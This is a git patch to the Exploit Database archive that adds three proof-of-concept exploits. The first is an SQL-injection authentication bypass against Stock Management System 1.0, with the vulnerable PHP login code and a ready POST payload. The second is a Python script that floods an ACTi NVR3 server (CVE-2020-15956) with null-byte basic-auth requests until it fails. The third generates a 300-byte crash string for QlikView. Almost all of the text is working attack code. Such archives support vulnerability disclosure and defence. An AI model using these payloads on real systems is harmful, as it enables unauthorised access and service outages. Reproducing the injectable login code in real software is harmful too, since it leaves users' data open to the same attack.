From b4336a29355364a4cf1e4cc48be8974d8863e544 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 6 Aug 2020 05:01:49 +0000 Subject: [PATCH] DB: 2020-08-06 3 changes to exploits/shellcodes ACTi NVR3 Standard or Professional Server 3.0.12.42 - Denial of Service (PoC) QlikView 12.50.20000.0 - 'FTP Server Address' Denial of Service (PoC) Stock Management System 1.0 - Authentication Bypass --- exploits/php/webapps/48733.txt | 71 ++++++++++++++++++++++++++++++++++ exploits/windows/dos/48731.py | 41 ++++++++++++++++++++ exploits/windows/dos/48732.py | 24 ++++++++++++ files_exploits.csv | 3 ++ 4 files changed, 139 insertions(+) create mode 100644 exploits/php/webapps/48733.txt create mode 100755 exploits/windows/dos/48731.py create mode 100755 exploits/windows/dos/48732.py diff --git a/exploits/php/webapps/48733.txt b/exploits/php/webapps/48733.txt new file mode 100644 index 000000000..b0e17a5b9 --- /dev/null +++ b/exploits/php/webapps/48733.txt @@ -0,0 +1,71 @@ +# Exploit Title: Stock Management System 1.0 - Authentication Bypass +# Exploit Author: Adeeb Shah (@hyd3sec) +# Date: August 1, 2020 +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/php/14366/stock-management-system-php.html +# Version: 1.0 +# Tested On: Windows 10 (x64_86) + XAMPP 7.4.4 + +# Vulnerable Source Code + + +if($_POST) { + + $username = $_POST['username']; + $password = $_POST['password']; + + if(empty($username) || empty($password)) { + if($username == "") { + $errors[] = "Username is required"; + } + + if($password == "") { + $errors[] = "Password is required"; + } + } else { + $sql = "SELECT * FROM users WHERE username = '$username'"; + $result = $connect->query($sql); + + if($result->num_rows == 1) { + $password = md5($password); + // exists + $mainSql = "SELECT * FROM users WHERE username = '$username' AND password = '$password'"; + $mainResult = $connect->query($mainSql); + + if($mainResult->num_rows == 1) { + $value = $mainResult->fetch_assoc(); + $user_id = $value['user_id']; + + // set session + $_SESSION['userId'] = $user_id; + + header('location: http://localhost/stock/dashboard.php'); + } else{ + + $errors[] = "Incorrect username/password combination"; + } // /else + } else { + $errors[] = "Username doesnot exists"; + } // /else + } // /else not empty username // password + +} // /if $_POST +?> + + +# Malicious POST Request to https://TARGET/stock/index.php HTTP/1.1 +POST /stock/index.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.222.132/stock/ +Content-Type: application/x-www-form-urlencoded +Content-Length: 47 +DNT: 1 +Connection: close +Cookie: PHPSESSID=j3j54s5keclr8ol2ou4f9b518s +Upgrade-Insecure-Requests: 1 + +email='+or+1%3d1+--+admin&password=badPass \ No newline at end of file diff --git a/exploits/windows/dos/48731.py b/exploits/windows/dos/48731.py new file mode 100755 index 000000000..bb1480ffc --- /dev/null +++ b/exploits/windows/dos/48731.py @@ -0,0 +1,41 @@ +# Exploit Title: ACTi NVR3 Standard or Professional Server 3.0.12.42 - Denial of Service (PoC) # +# Date: 2020-08-04 # +# Exploit Author: MegaMagnus # +# Vendor Homepage: https://www.acti.com/ # +# Software Link: https://www.acti.com/DownloadCenter # +# Version: V.3.0.12.42 , V.2.3.04.07 # +# Tested on: Windows 7, Windows 10 # +# CVE: CVE-2020-15956 # +# This is a Proof of Concept Exploit, Please use responsibly. # +################################################################################# + +#!/usr/bin/env python +import requests +from requests.auth import HTTPBasicAuth +import sys + +def product_info(server): + try: + r = requests.get(sys.argv[1] + '/media/Product/getProductInfo', timeout=10) + if r.status_code == 200: + print(r.text) + return True + except Exception as e: + print(e) + return False + +if __name__ == "__main__": + if len(sys.argv) != 2: + print("usage: cve-2020-15956.py ") + exit(-1) + if product_info(sys.argv[1]): + print("Starting DOS. Use Ctrl-C (SIGINT) to stop!") + while True: + try: + payload = b"\x00" * (760) + r = requests.get(sys.argv[1] + '/Media/UserGroup/login', auth=HTTPBasicAuth('Basic',payload), timeout=10) + print(r.status_code) + except KeyboardInterrupt: + pass + except Exception as e: + pass \ No newline at end of file diff --git a/exploits/windows/dos/48732.py b/exploits/windows/dos/48732.py new file mode 100755 index 000000000..407710df2 --- /dev/null +++ b/exploits/windows/dos/48732.py @@ -0,0 +1,24 @@ +# Exploit Title: QlikView 12.50.20000.0 - 'FTP Server Address' Denial of Service (PoC) +# Discovery by: Luis Martinez +# Discovery Date: 2020-08-03 +# Vendor Homepage: https://www.qlik.com +# Software Link: https://www.qlik.com/us/trial/qlik-sense-business +# Tested Version: 12.50.20000.0 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: Windows 10 Pro x64 es + +# Steps to Produce the Crash: +# 1.- Run python code: QlikView_12.50.20000.0.py +# 2.- Open QlikView_12.50.20000.0.txt and copy content to clipboard +# 3.- Open "QlikView 12" +# 4.- File -> "Open FTP ..." +# 5.- Paste ClipBoard on "FTP Server Address" +# 6.- Connect +# 7.- Crashed + +#!/usr/bin/env python + +buffer = "\x41" * 300 +f = open ("QlikView_12.50.20000.0.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 50f6684a9..1c63aa170 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6757,6 +6757,8 @@ id,file,description,date,author,type,platform,port 48697,exploits/windows/dos/48697.py,"Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)",2020-07-26,"Felipe Winsnes",dos,windows, 48728,exploits/windows/dos/48728.py,"Mocha Telnet Lite for iOS 4.2 - 'User' Denial of Service (PoC)",2020-08-04,"Luis Martínez",dos,windows, 48729,exploits/windows/dos/48729.py,"RTSP for iOS 1.0 - 'IP Address' Denial of Service (PoC)",2020-08-04,"Luis Martínez",dos,windows, +48731,exploits/windows/dos/48731.py,"ACTi NVR3 Standard or Professional Server 3.0.12.42 - Denial of Service (PoC)",2020-08-05,MegaMagnus,dos,windows, +48732,exploits/windows/dos/48732.py,"QlikView 12.50.20000.0 - 'FTP Server Address' Denial of Service (PoC)",2020-08-05,"Luis Martínez",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -42972,3 +42974,4 @@ id,file,description,date,author,type,platform,port 48725,exploits/php/webapps/48725.txt,"Online Shopping Alphaware 1.0 - Authentication Bypass",2020-07-30,"Ahmed Abbas",webapps,php, 48727,exploits/python/webapps/48727.py,"Pi-hole 4.3.2 - Remote Code Execution (Authenticated)",2020-08-04,"Luis Vacacas",webapps,python, 48730,exploits/php/webapps/48730.py,"Daily Expenses Management System 1.0 - 'username' SQL Injection",2020-08-04,"Daniel Ortiz",webapps,php, +48733,exploits/php/webapps/48733.txt,"Stock Management System 1.0 - Authentication Bypass",2020-08-05,"Adeeb Shah",webapps,php,